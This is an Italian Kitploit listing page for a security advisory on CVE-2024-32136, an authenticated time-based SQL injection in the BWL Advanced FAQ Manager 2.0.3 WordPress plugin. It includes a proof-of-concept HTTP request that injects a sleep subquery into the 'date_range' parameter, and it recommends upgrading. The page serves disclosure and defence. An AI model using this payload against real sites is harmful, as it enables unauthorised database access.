Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-32136 | Kitploit
Strumenti/GitHubGitHub/xbz0n/cve-2024-32136
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingSicurezza dei Database
GitHubxbz0n/cve-2024-32136

CVE-2024-32136

Vedi Repository
32 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

BWL Advanced FAQ Manager 2.0.3 - SQL Injection post-autenticazione

Titolo dell'exploit: BWL Advanced FAQ Manager 2.0.3 - SQL Injection post-autenticazione
Data: 14 aprile 2024
Autore dell'exploit: Ivan Spiridonov (xbz0n)
Link del software: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
Versione: 2.0.3
Testato su: Ubuntu 20.04
CVE: CVE-2024-32136

SQL Injection

L'SQL injection è un tipo di vulnerabilità di sicurezza che consente a un attaccante di interferire con le query al database di un'applicazione. Di solito comporta l'inserimento o l'"iniezione" di una query SQL tramite i dati di input provenienti dal client nell'applicazione. Un exploit di SQL injection riuscito può leggere dati sensibili dal database, modificare i dati del database (Insert/Update/Delete), eseguire operazioni amministrative sul database (come lo spegnimento del DBMS), recuperare il contenuto di un determinato file presente nel file system del DBMS e, in alcuni casi, inviare comandi al sistema operativo.

Componenti interessati

  • Plugin: BWL Advanced FAQ Manager
  • Versione: 2.0.3
  • Parametro interessato: 'date_range'
  • Pagina interessata: /wp-admin/edit.php

Descrizione

La vulnerabilità esiste nel parametro 'date_range' utilizzato nella pagina 'bwl-advanced-faq-analytics' del plugin BWL Advanced FAQ Manager. Gli attaccanti autenticati possono eseguire comandi SQL arbitrari all'interno del database manipolando l'input di questo parametro.

Proof of Concept

Sfruttamento manuale

La seguente richiesta GET dimostra la vulnerabilità:

root@kitploit:~
GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics
Connection: close
Cookie: [Relevant Cookies]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Se la risposta del server viene ritardata di circa 20 secondi, ciò indica uno sfruttamento riuscito della SQL Injection basata sul tempo, confermando la vulnerabilità.

Raccomandazioni

Si consiglia agli utenti di BWL Advanced FAQ Manager v2.0.3 di aggiornare il plugin alla versione corretta v2.0.4.

Scarica lo strumento